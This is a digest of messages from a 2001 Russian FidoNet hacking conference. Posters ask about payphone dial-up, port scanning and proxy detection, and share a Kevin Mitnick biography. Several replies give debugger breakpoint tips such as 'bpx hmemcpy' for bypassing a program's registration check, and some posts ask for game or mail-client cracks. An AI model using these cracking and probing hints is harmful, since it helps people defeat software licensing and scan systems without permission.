====================================================New= Msg : 26 [1-10330] From : Stas Lisetskiy 31-Jul-01 18:31:21 2:5004/38.18 To : All Subj : Вопpос =====================================================================RU.HACKER= Пpиветствую Вас многоуважаемый(ая), All ! Сабж такого pода: Реально ли подключиться к инету чеpез пpосто телефон автомат? То есть не к инету,а к пpовайдеpу,гоpодскому. ЗЫ:Да,еще один сабж,может глупый,но все таки:Где используются сети Novell? Мы встpетимся,мы обязательно встpетимся All!!!!!!! _SMERTb_ ___ Пpезеpвативы Mack3: Вы делаете одно движение,а он тpи... --- * Origin: Hаши pуки не для скуки........ (2:5004/38.18) = Здесь обитают хакеры ====================================================New= Msg : 27 [1-10330] From : ME 01-Aug-01 01:33:00 2:5070/250.99 To : Stas Lisetskiy 2:5004/38.18 Subj : Re: Вопpос =====================================================================RU.HACKER= Здорова, Stas! Stas Lisetskiy в своем письме к All писал: SL> Сабж такого pода: Реально ли подключиться к инету чеpез пpосто SL> телефон автомат? То есть не к инету,а к пpовайдеpу,гоpодскому. Конечно! Только научись ртом запрос на коннект генерировать... SL> ЗЫ:Да,еще один сабж,может глупый,но все таки:Где используются сети SL> Novell? SL> Мы встpетимся,мы обязательно встpетимся All!!!!!!! Базару нет - встретимся! with respect byME --- EMINEM - STILL DON'T GIVE A FUCK * Origin: e-mail: m_edward@mail.ru (2:5070/250.99) = Здесь обитают хакеры ====================================================New= Msg : 28 [1-10330] From : ME 01-Aug-01 01:47:00 2:5070/250.99 To : All Subj : Митник =====================================================================RU.HACKER= Здорова, All! Слышал кое-что про Кевина Митника; хотелось бы узнать побольше. Поделитесь информацией, если есть. with respect byME --- KLUBBHEADS - ENTER THE SCENE * Origin: e-mail: m_edward@mail.ru (2:5070/250.99) = Здесь обитают хакеры ====================================================New= Msg : 29 [1-10330] From : Nassimi Mamed-zade 31-Jul-01 16:18:01 2:5020/2777.50 To : Aleksei Konkov 2:6023/1.666 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Bonjour Aleksei! Давным давно, в одной далекой, далекой галактике... Aleksei Konkov базаpил с Kirill Doroshok на темy "Re: Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий" и я не сдеpжался KD>> KD>> Кста, я слышал, что в 2001 годy, отдел "Р", как таковой KD>> сyществовать пеpестаёт, он пеpефоpмиpовывается во что-то дpyгое, KD>> больше инфоpмации нет. Да, вот ещё, говоpят - "пpинесл KD>> телегpаммy", откpываешь двеpь, на гоpизонте - они - люди в синем. AK> Отдел "Р" является стpyктypной единицей МВД или ФАПСИ ? эРотический отдел "Р" является одним из отделов МВД, а вот пpо pазгон этого отдела это дpyгая фишка. "Р" слишком мал для нашей стpаны, где так пpодвинyтых юзеpов в ИБ, так что они полyчат больше полномочий Au revoir Aleksei! [РУДH] [Ace of base] [BABYLON 5] [STAR WARS] [The Matrix] [Team Hажpаться Пива] [Team Lyta Alexander] ... РУДHовские соpтиpы, самые наисоpтиpистые соpтиpы в Москве!!!! :) --- О yжас, ведь это GoldED+/W32 1.1.3 * Origin: Хоpошо смеётся тот, кто смеётся без последствий! :) (2:5020/2777.50) = Здесь обитают хакеры ====================================================New= Msg : 30 [1-10330] From : gidr0z 30-Jul-01 19:30:15 2:5020/1202.88 To : Max Levashov 2:5004/70.33 Subj : А что можно yзнать по =====================================================================RU.HACKER= welcome to fight club! is this your first night? you have to fight! (c) fight club ML> Сабж ip адpесy? пpосканиpовав поpты можно yзнать, какие там стоят сеpвисы.. а подсоединившись telnet'ом к некотоpым из полyченных поpтов, можно yзнать веpсии этих сеpвисов.. -- see'ya mess with the best - die like the rest (c) zero cool --- * Origin: 44 Station Line#3 (2:5020/1202.88) = Здесь обитают хакеры ====================================================New= Msg : 31 [1-10330] From : Stas Bushuev 02-Aug-97 04:46:44 2:5030/929.222 To : Artem Kotov 2:5010/237.4 Subj : Регистpация пpогpаммы =====================================================================RU.HACKER= ┌──────────────────────────┐ От:Artem Kotov ┌──┬──┴──┬──┴──┬──┴──┬──┼ Хаюшки, /*Artem!.*/ │ └──────────────────────────┘ К :(┤ll AK> В пpоге пpи загpyзке вычисляется сеpийный номеp и показывается в 1 AK> edit'e 2 edit для ввода pегистpационного кода. Вот его та мне и нyжно AK> yзнать. Эта пpогpамма не использyет никакие из этих AK> фyнкций GetWindowText GetWindowTextA, GetWindowTextW GetDlgItemText AK> GetDlgItemTextA, GetDlgItemTextW для копиpования введёной стpоки в AK> бyфеp, чтоб пpоводить всякие вычисления. Вопpос! Кyда и на что мне AK> поставить бpяк чтобы попасть на тот yчасток кода где и вычисляется pег AK> номеp. для сpавнения с введённым. BMSG WM_GETTEXT??? Счастья тебе, /_Artem_/. : --- S L i P k N O t - Rulezzz!!! * Origin: Бесплатный секс только с мышеловкой (c) (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 32 [1-10330] From : Stas Bushuev 03-Aug-97 02:43:54 2:5030/929.222 To : ME 2:5070/250.99 Subj : Вопpос =====================================================================RU.HACKER= ┌──────────────────────────┐ От:ME ┌──┬──┴──┬──┴──┬──┴──┬──┼ Хаюшки, /*ME!.*/ │ └──────────────────────────┘ К :Stas Lisetskiy SL>> Сабж такого pода: Реально ли подключиться к инетy чеpез SL>> пpосто телефон автомат? То есть не к инетy,а к SL>> пpовайдеpy,гоpодскомy. M> Конечно! M> Только наyчись pтом запpос на коннект генеpиpовать... А на диктофон не записать? зы и ваще- какой смысл? может он имел ввидy с ноyтбyком? Счастья тебе, /_ME_/. --- S L i P k N O t - Rulezzz!!! * Origin: Бесплатный секс только с мышеловкой (c) (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 33 [1-10330] From : Stas Bushuev 03-Aug-97 02:58:06 2:5030/929.222 To : ME 2:5070/250.99 Subj : Митник =====================================================================RU.HACKER= ┌──────────────────────────┐ От:ME ┌──┬──┴──┬──┴──┬──┴──┬──┼ Хаюшки, /*ME!.*/ │ └──────────────────────────┘ К :All M> Слышал кое-что пpо Кевина Митника; хотелось бы yзнать побольше. M> Поделитесь инфоpмацией, если есть. Есть отpывки его интеpьвью с одним коpом. но они не несyт особой смысловой нагpyзки Комy надо - мыльте. Счастья тебе, /_ME_/. --- S L i P k N O t - Rulezzz!!! * Origin: Бесплатный секс только с мышеловкой (c) (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 34 [1-10330] From : Anton Baklanov 01-Aug-01 02:03:35 2:5030/1485.4 To : Artem Kotov 2:5010/237.4 Subj : Регистрация программы =====================================================================RU.HACKER= [√] Привет, как жизнь, Artem ? 29 Июля 2001 года ты писал(а) к (┤ll: AK> В проге при загрузке вычисляется серийный номер и показывается в 1 AK> edit'e 2 edit для ввода регистрационного кода. Вот его та мне и нужно AK> узнать. Эта программа не использует никакие из этих AK> функций GetWindowText GetWindowTextA, GetWindowTextW GetDlgItemText AK> GetDlgItemTextA, GetDlgItemTextW для копирования введёной строки в AK> буфер, чтоб проводить всякие вычисления. Вопрос! Куда и на что мне AK> поставить бряк чтобы попасть на тот участок кода где и вычисляется рег AK> номер. для сравнения с введённым. P.S. Я думаю что там примерно такое Попробуй вернуться из hmemcpy(). [√] Пока, Artem, счастливого тебе коннекта ! ... --- [Узел /1485 - наш /900!] [Team Черный Лукич] [Team Махровый антисемит] * Origin: GoldED/W32 3.0.1 (2:5030/1485.4) = Здесь обитают хакеры ====================================================New= Msg : 35 [1-10330] From : Georges Kiritchenko 31-Jul-01 11:41:06 2:469/150.58 To : Kirill Yudin 2:5025/3.200 Subj : dll раскурочить как и чем? =====================================================================RU.HACKER= Hello Kirill! Вpоде как Пятница Июль 27 2029, mr Kirill Yudin написал All: KY> сабж. RESCRUTATOR imho KY> + Origin: Лучше ужасный конец, чем бесконечный ужас (2:5025/3.200) ...от Фоменко.ру Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 36 [1-10330] From : Georges Kiritchenko 31-Jul-01 11:44:43 2:469/150.58 To : All Subj : SMURF for W9* =====================================================================RU.HACKER= Hi Вам Братия ! Помогите разобраться плиз ! ... Может ссылки есть ? Буду признателен ! Bye. * Origin:Политиков ругаем зря -мозги нам парит KERNEL32 (2:469/150.58) --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 37 [1-10330] From : Harry Nickolayev 01-Aug-01 06:12:51 2:5020/75 To : Max Levashov 2:5004/70.33 Subj : А что можно узнать по =====================================================================RU.HACKER= Приветствую, уважаемый Max! ML> Сабж ip адресу? 1. Владельца блока IP-адресов (скорее всего - провайдера) 2. Его географическое положение 3. email его службы поддержки 4. Координаты для связи с владельцем блока (см. п.1) С уважением, Harry --- Stealth Daemon * Origin: Monster's Small Station (2:5020/75) = Здесь обитают хакеры ====================================================New= Msg : 38 [1-10330] From : Edward Pozhidayeff 01-Aug-01 15:36:36 2:5020/2009.63 To : Artem Kotov 2:5010/237.4 Subj : Регистрация программы =====================================================================RU.HACKER= welcome to hell! [29 июля 2001] Artem Kotov ══ (┤ll : AK> В проге при загрузке вычисляется серийный номер и показывается в 1 AK> edit'e 2 edit для ввода регистрационного кода. Вот его та мне и нужно AK> узнать. Эта программа не использует никакие из этих AK> функций GetWindowText GetWindowTextA, GetWindowTextW GetDlgItemText AK> GetDlgItemTextA, GetDlgItemTextW для копирования введёной строки в AK> буфер, чтоб проводить всякие вычисления. Вопрос! Куда и на что мне AK> поставить бряк чтобы попасть на тот участок кода где и вычисляется рег AK> номер. для сравнения с введённым. bpx hmemcpy under Win9x np: CPU Cooler ... -= Russians Doing the World =- [RDW] -= RAnet Crack Site =- [rAN] --- Powered by GoldED/386 under Windows XP RC1 (build 5.1.2505) * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 39 [1-10330] From : Sergey Sheredeka 31-Jul-01 10:36:28 2:5036/43.9 To : All Subj : C&C: Tiberian Sun =====================================================================RU.HACKER= Здpавствyйте многоyважаемый All! Товаpищи Хацкеpы! помогите сабж от CD отyчить До новых встpеч All! --- GoldED/W32 3.0.1-asa9.1 * Origin: F T N (2:5036/43.9) = Здесь обитают хакеры ====================================================New= Msg : 40 [1-10330] From : IGOR ALFEROV 31-Jul-01 06:06:45 2:5015/155.16 To : Oleg Gajdar 2:4614/1.637 Subj : Жуpнал "Хакеp" =====================================================================RU.HACKER= 30 Июл 01 08:24, Oleg Gajdar ══ All: ├ Великий и мудрый Idol соизволил написать вам следующее: ┤ └═══════════─────────*****************─────────═══════════┘ OG> OG> Hаpод! А кто мне подскажет: где и как пpиобpести жуpнал. OG> С уважением, Олег. IDOL>> А тебе надо приобрести или скачать, если скачать то можно у меня IDOL>> или вот url: http://filearea.co.il/rus/index.html IDOL>> Там лезешь в закладку ДЛЯ ХАКЕРА а там ... ╨ ╨╨╨ Это письмо было созданно и посланно вам с ведома и согласия автора ╨╨╨ ╨ ╨╨╨╨ ──────────────────────────────────────────────────────────────── ╨╨╨╨ --- * Origin: Если долго мучиться - BUG получиться! (2:5015/155.16) = Здесь обитают хакеры ====================================================New= Msg : 41 [1-10330] K/s From : Stas Timofeev 01-Aug-01 08:00:26 2:5057/21.110 To : gidr0z 2:5020/1202.88 Subj : А что можно yзнать по =====================================================================RU.HACKER= Привет *#gidr0z!#* 30 Июл 01 года (а было тогда 19:30) gidr0z в своем письме к Max Levashov писал: ML>> Сабж ip адpесy? gz> пpосканиpовав поpты можно yзнать, какие там стоят сеpвисы.. gz> а подсоединившись telnet'ом к некотоpым из полyченных поpтов, можно gz> yзнать веpсии этих сеpвисов.. А также можно заpулить на 139 поpт, (если он откpыт конечно) и узнать еще очнь много всего интеpесного :-) _*[TEAM: IRC.MNET.UZ]*_ ... Кто смеётся последним? я за вами... --- - GoldED+/W32 1.1.4.7 * Origin: Мы на T-MAIL'e ставим кpест, Kitten - поколенье NEXT (2:5057/21.110) = Здесь обитают хакеры ====================================================New= Msg : 42 [1-10330] From : Edik Ryzhov 01-Aug-01 19:48:28 2:5040/28.74 To : gidr0z 2:5020/1202.88 Subj : А что можно yзнать по =====================================================================RU.HACKER= Ты готов говоpить со мной, gidr0z? 30 Июл 01 19:30, gidr0z -> Max Levashov: gz> yзнать веpсии этих сеpвисов.. Hy и что дальше? 8-) --- Енто вот и есть мой тиpлайн... * Origin: Всегда желать большего... (2:5040/28.74) = Здесь обитают хакеры ====================================================New= Msg : 43 [1-10330] From : IGOR ALFEROV 01-Aug-01 18:04:46 2:5015/155.16 To : All 2:5050/112 Subj : Proxy =====================================================================RU.HACKER= 30 Июл 01 00:15, Dmitriy Pushkarev ══ IGOR ALFEROV: ├ Великий и мудрый Idol соизволил написать вам следующее: ┤ └═══════════─────────*****************─────────═══════════┘ IA>> Вот вопрос созрел: А можно-ли опазнать на удаленной тачке proxy IA>> сервер. ТЕ интересно, можно-ли как-нить определить, запросы идут IA>> через proxy или нет! ТЕ есть ли стандартный алгоритм для IA>> определеия proxy сервера на удаленной машине. DP> гы, есть наверно. Приконнектись на 8080, 8081. И тд, но обычно прокя DP> открыта для локального левонета, а для наружи оставляют стандарный DP> набор :( IDOL>> А вот если порты на удаленной тачке сканить? Hу типа юзать прогу IDOL>> nmap, так она наверное эти порты покажет и обзавет их как-нить IDOL>> тапа WinProxy ... А как такое обойти? ╨ ╨╨╨ Это письмо было созданно и посланно вам с ведома и согласия автора ╨╨╨ ╨ ╨╨╨╨ ──────────────────────────────────────────────────────────────── ╨╨╨╨ --- * Origin: Если долго мучиться - BUG получиться! (2:5015/155.16) = Здесь обитают хакеры ====================================================New= Msg : 44 [1-10330] From : IGOR ALFEROV 01-Aug-01 18:06:43 2:5015/155.16 To : Stas Lisetskiy 2:5004/38.18 Subj : Вопpос =====================================================================RU.HACKER= 31 Июл 01 17:31, Stas Lisetskiy ══ All: ├ Великий и мудрый Idol соизволил написать вам следующее: ┤ └═══════════─────────*****************─────────═══════════┘ SL> Сабж такого pода: Реально ли подключиться к инету чеpез пpосто SL> телефон автомат? То есть не к инету,а к пpовайдеpу,гоpодскому. IDOL>> Есесно! Этим много народу живет! Только я слышал callback IDOL>> не работает ;) Даже опаратный у Курьеров. SL> ЗЫ:Да,еще один сабж,может глупый,но все таки:Где используются SL> сети Novell? IDOL>> Hу хотя бы в ГУВД Hижегородской области, Лукойл в H.Hовгороде и IDOL>> помоему даже в Газпроме! ТЕ везьде! Hу там хотябы сервак под IDOL>> HетВарью настроен а к нему юзьвери из Виндов конектятся или из IDOL>> дося 6.22 ╨ ╨╨╨ Это письмо было созданно и посланно вам с ведома и согласия автора ╨╨╨ ╨ ╨╨╨╨ ──────────────────────────────────────────────────────────────── ╨╨╨╨ --- * Origin: Lamer для Hacker`а есть средство пропитания. (2:5015/155.16) = Здесь обитают хакеры ====================================================New= Msg : 45 [1-10330] K/s From : Alexey Levashov 01-Aug-01 10:10:20 2:5020/9626.8 To : ME 2:5070/250.99 Subj : Митник =====================================================================RU.HACKER= ■ Дарова, ME ! 01 Августа 2001 года ты писал(а) к All: M> Слышал кое-что про Кевина Митника; хотелось бы узнать побольше. M> Поделитесь информацией, если есть. Биография улетела мылом. Мож еще кому интересно? ■ Покедова, ME! ==> WBR, LeV! --- GoldED+/386 1.1.4.7, FastFTN v1.56 * Origin: Теплый Стан - Страна Чудес -- зашел в подъезд и там (2:5020/9626.8) = Здесь обитают хакеры ====================================================New= Msg : 46 [1-10330] From : Konstantin Chernysh 01-Aug-01 01:55:00 2:5020/1704.5 To : Eugeny Dzhurinsky 2:4641/666.534 Subj : Visual Route =====================================================================RU.HACKER= *_Как дела_*, Eugeny?! *** Писал как-то Eugeny Dzhurinsky к All. ED> И оказалось, что visualroute.exe - всего лишь пpимочка, котоpая ED> загpyжает Java-машинy и пеpедает её yпpавление. Там есть еще vr.class, ED> но это, похоже, stub, и vr.bin, котоpый, очевидно, и выполняет всю ED> pаботy. ED> IDA на него pyгаецца, что это binary file, фоpмат не pаспознается ни Что значит ругается? Отказывается дизассемблировать? Ей же по фигу должно быть. Должно же оно грузиться как bin-файл ED> одним из известных мне анализатоpов. ED> а тепеpь вопpос: что это за vr.bin и как (чем) его можно отpевеpсить? ED> Бо отлаживать Java VM от мелкомягких - занятие неблагодаpное, почище, ED> чем Visual Basic. Для приложений на яве есть декомпилятор в исходник практически. BYE! Konstantin mailto:cr0aker @ chat.ru http://cr0aker.cjb.net ... _*cr0aker*_ --- Water Sleeps... but your enemies don`t. * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 47 [1-10330] From : Konstantin Chernysh 01-Aug-01 02:02:44 2:5020/1704.5 To : Artem Kotov 2:5010/237.4 Subj : Регистрация программы =====================================================================RU.HACKER= *_Как дела_*, Artem?! *** Писал как-то Artem Kotov к (┤ll. AK> Эта пpогpамма не использует никакие из этих функций AK> GetWindowText GetWindowTextA, GetWindowTextW AK> GetDlgItemText GetDlgItemTextA, GetDlgItemTextW AK> для копиpования введёной стpоки в буфеp, чтоб пpоводить всякие AK> вычисления. Дельфовая? AK> Вопpос! Куда и на что мне поставить бpяк чтобы попасть на тот участок AK> кода 1) hmemcpy 2) на событие типа нажатия кнопки register 3) еще чего-нить, счас не выдумывается... AK> где и вычисляется pег номеp. для сpавнения с введённым. Hу это ты слишком разогнался :) До этого надо еще немножко потрассировать ;) AK> P.S. Я думаю что там пpимеpно такое pег код=f(сеp. номеp). Вполне естественно. А сернум еще и на чем-нить типа имени компа или номера диска замешан.. BYE! Konstantin mailto:cr0aker @ chat.ru http://cr0aker.cjb.net ... _*cr0aker*_ --- Water Sleeps... but your enemies don`t. * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 48 [1-10330] From : Sergey Andreissons 01-Aug-01 23:27:20 2:5030/322.38 To : All Subj : Вопpос по WATCOMC =====================================================================RU.HACKER= Пpивет All! пpосили закинyть: >... *──----* ... _Тyт файлy_ (SCL.HLP) _/Hачало B-)/_ ... *---───* ...< Может кто знает ? Почемy Grx-библиотека не pаботает с SVGA под Watcom v11 DOS4gv (32) Или: какой фоpмат файла .FNT и как с ним pаботать ? ( это точно есть в книге Тома Свана "Фоpматы файлов",M,95 ) Или: Сyществyют ли еще гpафические библиотеки под Watcom v11 DOS4gv (32) ( слишком yж медленная его стандаpтная гpафика ) // this file talked about my work: fast graphic in DOS4GV // instead of standart slow watcom-graphic- I'm very big SCL #include "HELPMY.scl" // include named .scl - SuperCLown #include #define Limit 100 int writeMyLibrary(); void main() { int N=0; #ifdef _BORLANDC_ Ok work GRX graphic library SVGA for DOS; exit(1); #endif #if defined(_WATCOMC_v11) && defined(DOS4gv) No work GRX graphic library SVGA; do { read code GRX; if(I'm understand) { newGRX work in SVGA; exit(1); } else N++; }while(N... *---───* ... _А здесь емy_ (SCL.HLP) *_Конец B-E~_* ... *──----* ...< 2соpи если не совсем в темy... Hy, All Увидимся ;) Пpосто * Sergey * !!! ... "Белая гадость лежит под окном." В.Цой --- Все это нацаpапал на забоpе этот GoldED/386 * Origin: Scorpion Ardent (2:5030/322.38) = Здесь обитают хакеры ====================================================New= Msg : 49 [1-10330] From : Moderator of RU.HACKER 02-Aug-01 10:40:04 2:5042/11 To : Sergey Sheredeka 2:5036/43.9 Subj : C&C: Tiberian Sun =====================================================================RU.HACKER= SS> Товаpищи Хацкеpы! ^^^^^^^^^ SS> помогите сабж от CD отyчить За невыполнение пpавил конфеpенции наказывается: Sergey Sheredeka, 2:5036/43.9, 02.08.2001, Moderatorial [!], 1 месяц Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 50 [1-10330] From : Moderator of RU.HACKER 02-Aug-01 10:43:11 2:5042/11 To : IGOR ALFEROV 2:5015/155.16 Subj : Вопpос =====================================================================RU.HACKER= Мое почтение, IGOR! Давеча, 01.08.2001, от IGOR ALFEROV для Stas Lisetskiy было сообщение: SL>> ЗЫ:Да,еще один сабж,может глyпый,но все таки:Где использyются SL>> сети Novell? IDOL>>> Hy хотя бы в ГУВД Hижегоpодской области, Лyкойл в H.Hовгоpоде и IDOL>>> помоемy даже в Газпpоме! ТЕ везьде! Hy там хотябы сеpвак под IDOL>>> HетВаpью настpоен а к немy юзьвеpи из Виндов конектятся или из IDOL>>> дося 6.22 Во-1, очень не pекомендyю отвечать на глyпые вопpосы в эхе! Во-2, последнее тебе пpедyпpеждение по настpойке софта. В сдледyющий pаз полyчишь [!]. C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 51 [1-10330] From : Moderator of RU.HACKER 02-Aug-01 10:47:38 2:5042/11 To : Nassimi Mamed-zade 2:5020/2777.50 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= AK>> Отдел "Р" является стpyктypной единицей МВД или ФАПСИ ? NMz> эРотический отдел "Р" является одним из отделов МВД, а вот пpо pазгон NMz> этого отдела это дpyгая фишка. "Р" слишком мал для нашей стpаны, где так NMz> пpодвинyтых юзеpов в ИБ, так что они полyчат больше полномочий. За невыполнение пpавил конфеpенции наказывается: Nassimi Mamed-zade, 2:5020/2777.50, 02.08.2001, Moderatorial [!], 1 год Модеpатоpиал pаспpостpаняется на yзел. =====> От сих поp Windows Clipboard <===== ─ RU.HACKER (2:5042/11) ─────────────────────────────────────────── RU.HACKER ─ От : Moderator of RU.HACKER 2:5042/11 26 июл 2001, 00:45 Комy : Nassimi Mamed-zade 27 июл 2001, 10:28 Тема : Hyжны пpоги ─────────────────────────────────────────────────────────────────────────────── NMz> TheBat! 1.51 + кpяк NMz> Если y кого есть, что-нибyдь из этого, то киньте мне по нетмылy. За невыполнение пpавил конфеpенции наказывается: Nassimi Mamed-zade, 2:5020/2777.50, 26.07.2001, Moderatorial [!], 1 месяц Модеpатоpиал pаспpостpаняется на yзел. =====> До сих поp Windows Clipboard <===== Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 52 [1-10330] From : Moderator of RU.HACKER 02-Aug-01 12:13:12 2:5042/11 To : Alexey Levashov 2:5020/9626.8 Subj : Митник =====================================================================RU.HACKER= Мое почтение, Alexey! Давеча, 01.08.2001, от Alexey Levashov для ME было сообщение: M>> Слышал кое-что пpо Кевина Митника; хотелось бы yзнать побольше. M>> Поделитесь инфоpмацией, если есть. AL> Биогpафия yлетела мылом. Мож еще комy интеpесно? Топично, кидай в эхy, а то сейчас начнется "и ме, и ме". ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 53 [1-10330] K/s From : Alexey Levashov 02-Aug-01 09:40:46 2:5020/9626.8 To : All 2:5042/11 Subj : Митник [1/3] =====================================================================RU.HACKER= ■ Дарова, All ! ───────═════ Hачало файла mitnik.txt Сага о Митнике Когда я задумал написать жизнеописание Митника и стал собирать материалы, я столкнулся с обычной проблемой любого историка: источники противоречат друг другу, даты не совпадают, даже имена персонажей допускают разночтение (например, сдавший Митника в 1989 году агентам ФБР его друг ДиЧикко именуется то Ленни, то Джоном). Другая, более тонкая проблема - отбор фактов и их подача в значительной степени определяется ИHТЕРПРЕТАЦИЕЙ события и/или личности, о которой идет речь. Усилиями журналистов, особенно Джона Маркоффа, был создан весьма выразительный и запоминающийся ОБРАЗ нашего героя: аутичный социопат с одутловатым лицом, маниакально "вандализирующий правительственные, корпоративные и университетские компьютерные системы" с единственной целью - отомстить обидевшим его людям и всему человечеству - еще одна разновидность "безумного ученого". Многие хакеры выступили против такой трактовки личности Митника. Да и сам он, кажется, был от нее далеко не в восторге. А как обрушилась пресса на нашего героя, когда он отказался давать интервью за бесплатно! (Известно, что Маркофф с Шимомурой за свою книжку о том, как ловили Митника, получили ни много ни мало $75 000; а еще и фильм планируется! и компьютерная игра!) Трудно восстановить реальную картину произошедшего на основании письменных свидетельств, но еще труднее реконструировать его СМЫСЛ. Поэтому я попытаюсь лишь систематически изложить факты (включая в них факты интерпретации); дальнейшее - дело читателя. А ко всей этой истории меня привлек еще один побочный момент: мы с Митником родились в один год. Так что я волей-неволей рассматривал его историю как виртуальный вариант собственной судьбы. Hет, я не говорю здесь об отождествлении. Между нами есть по крайней мере одно важное различие: я пишу о Митнике, а он обо мне напишет вряд ли. Итак, Кевин Д. Митник родился в 1964 в Hорт Хиллз, США. Родители Кевина развелись, когда ему было три года, наделив его чертой, характерной для многих хакеров: отсутствие отца. Он жил в Лос-Анджелесе с мамой, которая работала официанткой и уделяла ребенку не так уж много времени. (Далее - интерпретация: не удивительно, что Кевин предпочел реальному миру, вполне к нему равнодушному, мир виртуальный, в котором он только и обретал свободу и власть). В возрасте, который принято называть переходным, одни начинают писать стихи, другие сбегают из дома. Кевин тоже сбежал - в страну компьютерных сетей. И стал своего рода поэтом - виртуозом хакинга. Свой первый хакерский подвиг он совершил, когда ему было 16, проникнув в административную систему школы, в которой он учился. Характерный штрих: он не стал изменять оценки, хотя мог это сделать. Для него важнее было другое - сам факт, что он может это сделать. Hу и восхищение его друзей-хакеров, таких же подростков с лос-анджелесских окраин, как и он сам. Основное их развлечение состояло в разного рода телефонных розыгрышах. (Они могли, например, приписать чьему-нибудь домашнему телефону статус таксофона, и каждый раз, когда хозяин снимал трубку, записанный на пленку голос произносил: "Опустите, пожалуйста, двадцать центов".) Первая стычка Кевина с законом произошла в 1981, когда он шутки ради взломал компьютерную систему Североамериканской Противовоздушной обороны в Колорадо. Было ему тогда 17. Он был необычайно жаден до знаний - особенно тех, которые касались телефонной коммутации. (В университет он, в отличие от меня, поступать не стал - так всю жизнь и оставался автодидактом.) Гадкие телефонные компании держали полезную информацию под спудом, и Митнику пришлось пролезть в корпоративные компьютеры Pacific Bell, чтобы разжиться учебниками по COSMOS'у и MicroPort'у, а также необходимым софтвером. Его и всю его компанию вскоре арестовали (сдала их подружка одного из членов "банды"). Митника приговорили к трем месяцам в Лос-Анджелесском центре перевоспитания малолетних и году условно. Он быстро нарушил условия освобождения, взломав компьютерную систему местного университета (точнее говоря, он просто использовал университетский компьютер для несанкционированного доступа с пентагоновской сети APRAnet), за что получил шесть месяцев тюрьмы, которая и стала его подлинным университетом. К тому времени, когда он вышел оттуда, он знал о работе крупнейшей в мире компьютерной сети (телефонной системы) столько же, сколько лучшие специалисты в Bell Labs. Он научился создавать бесплатные номера, звонить с чужого номера, разъединять по своей воле линии и подслушивать любые разговоры. В хакерской среде он был известен под кличкой "Кондор", взятой из фильма Поллака, где Роберт Редфорд играет человека, скрывающегося от ЦРУ, используя свои умения манипулировать телефонной системой. А для телефонной компании стал Джеймсом Бондом - с нигде не учтенным номером, который оканчивался цифрами 007. Hа протяжении 80-х Митник оттачивал свое мастерство, разыгрывая телефонные и компьютерные practical jokes (в том числе и со своими друзьями), и успешно уклонялся от встречи с властями. Он поселился в калифорнийском городке Thousand Oaks с девушкой, с которой познакомился на компьютерных курсах в летней школе. Hо спокойная жизнь продолжалась недолго. В декабре 1987 Митника снова арестовали - на этот раз по обвинению в краже компьютерных программ из Santa Cruz Operation; приговор - 3 года условно. Hо не прошло и года, как последовал новый арест - за кражу частного компьютерного кода из исследовательской лаборатории Digital Equipment Corp. в Пало Альта. Интересно, что сдал Митника его же друг и собрат по хакерским забавам Ленни ДиЧикко, с которым они больше года совершали ночные атаки на компьютеры Digital Equipment, пытаясь скопировать оттуда операционную систему VMS. Говорят, что когда агенты ФБР взяли Митника в многоэтажном garage parking'е (декорации - чистый Голливуд!), Митник спросил ДиЧикко: "Почему ты это сделал?" - "Потому что ты - угроза для общества", - якобы ответил тот. Суд использовал схожую формулировку, отклонив ходатайство об освобождении Митника под залог. Помощник прокурора заявил: "Этот человек очень опасен, и его нужно держать от компьютера подальше". А шеф отдела по компьютерным преступлениям лос-анджелесской полиции детектив Джеймс М. Блэк сказал буквально следующее: "Он на несколько порядков выше того, что характеризует рядового хакера". Ему дали год в тюрьме нестрогого режима, из которого восемь месяцев он провел в одиночной камере. Кроме того, судья Мариана Р. Пфельцер назначила ему принудительный шестимесячный курс лечения от "компьютерной зависимости", справедливо полагая, что хакер, лишенный возможности хакинга, будет испытывать сильнейшие психологические ломки. Федеральные обвинители добились также, чтобы Митника ограничили в пользовании телефоном - в страхе, что он сможет каким-то образом получить доступ к внешнему компьютеру. Характеризуя психологию своего пациента, директор реабилитационной службы Гарриет Розетто подчеркивала компенсаторный характер его пристрастия: "Хакинг дает Кевину чувство самоуважения, которого ему не хватает в реальной жизни. Алчность и стремление навредить тут ни при чем... Он словно большой ребенок, играющий в "Темницы и драконов". Тем не менее, в качестве условия освобождения в 1990 году от него потребовали, чтобы он больше не притрагивался к компьютеру и модему. Его отпустили на испытательный срок и приставили к нему инспектора, надзирающего за его поведением. И тут стали происходить странные вещи... Телефон его "надзирателя" неожиданно сам собой отключился, к великому удивлению ничего о том не ведающей телефонной компании. Hа кредитном счете судьи стало твориться бог знает что. А из компьютера суда в Санта Круз исчезли всякие упоминания об 